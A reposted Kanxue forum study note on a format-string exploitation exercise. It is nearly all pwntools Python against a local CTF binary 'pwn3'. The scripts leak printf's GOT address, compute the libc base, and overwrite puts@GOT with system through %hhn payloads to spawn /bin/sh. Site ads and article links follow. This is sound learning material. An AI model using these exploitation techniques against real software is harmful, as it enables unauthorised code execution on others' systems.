PWN学习笔记【格式化字符串漏洞练习】
本文为看雪论坛优秀文章
看雪论坛作者ID:洋洋不得意
from pwn import *
# context.log_level = 'debug'
sh = process("./pwn3")
sh.recvuntil(b"Name (ftp.hacker.server:Rainism):")
sh.sendline(b"rxraclhm")
def put():
sh.recvuntil(b"ftp>")
sh.sendline(b"put")
sh.recvuntil(b"please enter the name of the file you want to upload:")
sh.sendline(b"aaa")
sh.recvuntil(b"then, enter the content:")
sh.sendline(b'AAAA..%p..%p..%p..%p..%p..%p..%p..%p')
def get():
sh.recvuntil(b"ftp>")
sh.sendline(b"get")
sh.recvuntil(b"enter the file name you want to get:")
sh.sendline(b"aaa")
put()
get()
print(sh.recv())
sh.interactive()
def put():
sh.recvuntil(b"ftp>")
sh.sendline(b"put")
sh.recvuntil(b"please enter the name of the file you want to upload:")
sh.sendline(b"aaa")
sh.recvuntil(b"then, enter the content:")
sh.sendline(b'AAAA%7$p')
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
elf = ELF("./pwn3")
sh = process("./pwn3")#gdb.debug("./pwn3", "b *show_dir")
sh.recvuntil(b"Name (ftp.hacker.server:Rainism):")
sh.sendline(b"rxraclhm")
def put(file_name, file_content):
sh.recvuntil(b"ftp>")
sh.sendline(b"put")
sh.recvuntil(b"please enter the name of the file you want to upload:")
sh.sendline(file_name)
sh.recvuntil(b"then, enter the content:")
sh.sendline(file_content)
def get(file_name):
sh.recvuntil(b"ftp>")
sh.sendline(b"get")
sh.recvuntil(b"enter the file name you want to get:")
sh.sendline(file_name)
def dir():
sh.recvuntil(b"ftp>")
sh.sendline(b"dir")
def leakage_function_addr(got_addr):
put(b'get_addr', b'%8$s' + p32(got_addr))
get(b'get_addr')
function_addr = u32(sh.recv(4))
return function_addr
def compute_order_32(target):
print("target=%x"%target)
dic = {}
for i in range(4):
x = (target >> (i * 8))
x &= 0xff
dic[i] = x
ls = list(dic.items())
ls.sort(key=lambda x:x[1])
return ls
def hack(addr, value, offset_start):
list_of_value = compute_order_32(value)
print(list_of_value)
payload = flat([
p32(addr + 0),
p32(addr + 1),
p32(addr + 2),
p32(addr + 3)
])
total_char = 16
for it in list_of_value:
curr_char = it[1] - total_char
total_char += curr_char
payload += b"%" + str(curr_char).encode() + b"c%" + str(offset_start + it[0]).encode() + b"$hhn"
print("addr=%x"%addr)
debug(payload)
put(b'hack', payload)
get(b'hack')
printf_addr = leakage_function_addr(elf.got['printf'])
print("function_addr=0x%x" %printf_addr)
libc = LibcSearcher("printf", printf_addr)
libcBase = printf_addr - libc.dump('printf')
print("libcBase=%x" %libcBase)
system_addr = libcBase + libc.dump('system')
print("system_addr=%x" %system_addr)
hack(elf.got['puts'], system_addr, 7)
put(b'/bin/sh;', b'get shell')
dir()
sh.interactive()
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
elf = ELF("./pwn3")
sh = process("./pwn3")#gdb.debug("./pwn3", "b *show_dir")#, "b *get_file"
sh.recvuntil(b"Name (ftp.hacker.server:Rainism):")
sh.sendline(b"rxraclhm")
def put(file_name, file_content):
sh.recvuntil(b"ftp>")
sh.sendline(b"put")
sh.recvuntil(b"please enter the name of the file you want to upload:")
sh.sendline(file_name)
sh.recvuntil(b"then, enter the content:")
sh.sendline(file_content)
def get(file_name):
sh.recvuntil(b"ftp>")
sh.sendline(b"get")
sh.recvuntil(b"enter the file name you want to get:")
sh.sendline(file_name)
def dir():
sh.recvuntil(b"ftp>")
sh.sendline(b"dir")
def leakage_function_addr(got_addr):
put(b'get_addr', b'%8$s' + p32(got_addr))
get(b'get_addr')
function_addr = u32(sh.recv(4))
return function_addr
def hack(addr, value, offset_start):
payload = fmtstr_payload(7, {addr: value})
debug(payload)
put(b'hack', payload)
get(b'hack')
printf_addr = leakage_function_addr(elf.got['printf'])
print("function_addr=0x%x" %printf_addr)
libc = LibcSearcher("printf", printf_addr)
libcBase = printf_addr - libc.dump('printf')
print("libcBase=%x" %libcBase)
system_addr = libcBase + libc.dump('system')
print("system_addr=%x" %system_addr)
hack(elf.got['puts'], system_addr, 7)
put(b'/bin/sh;', b'get shell')
dir()
sh.interactive()
看雪ID:洋洋不得意
https://bbs.pediy.com/user-home-861996.htm
# 往期推荐
球分享
球点赞
球在看
点击“阅读原文”,了解更多!
[广告]赞助链接:
关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注KnowSafe微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
- 微软重大更新!Windows on Arm能玩更多游戏了
- 谷歌Go团队十二年技术负责人突然退位!微软、华为等表达感谢
- ida81输入密码验证算法分析以及破解思路
- CVE-2021-42287 Windows域内提权漏洞原理分析
- 美国一家航空公司意外泄露涉恐“禁飞名单”
- 诸子笔会2022 | 王忠惠:补齐业务所需的安全能力
- 看雪2022 KCTF 春季赛 | 第二题设计思路及解析(含视频)
- 自动写代码神器?竟然还有这东西!
- 【疯狂盲盒】9.9 狂欢节,让你提前嗨!
- IBM 能靠 2nm 芯片翻身吗?
- GlobalSign携手英飞凌加强物联网设备身份验证和可信度,以简化在微软Azure物联网中心的注册
- 亚洲诚信揽获DigiCert亚太区圆桌会议两项重磅大奖
赞助链接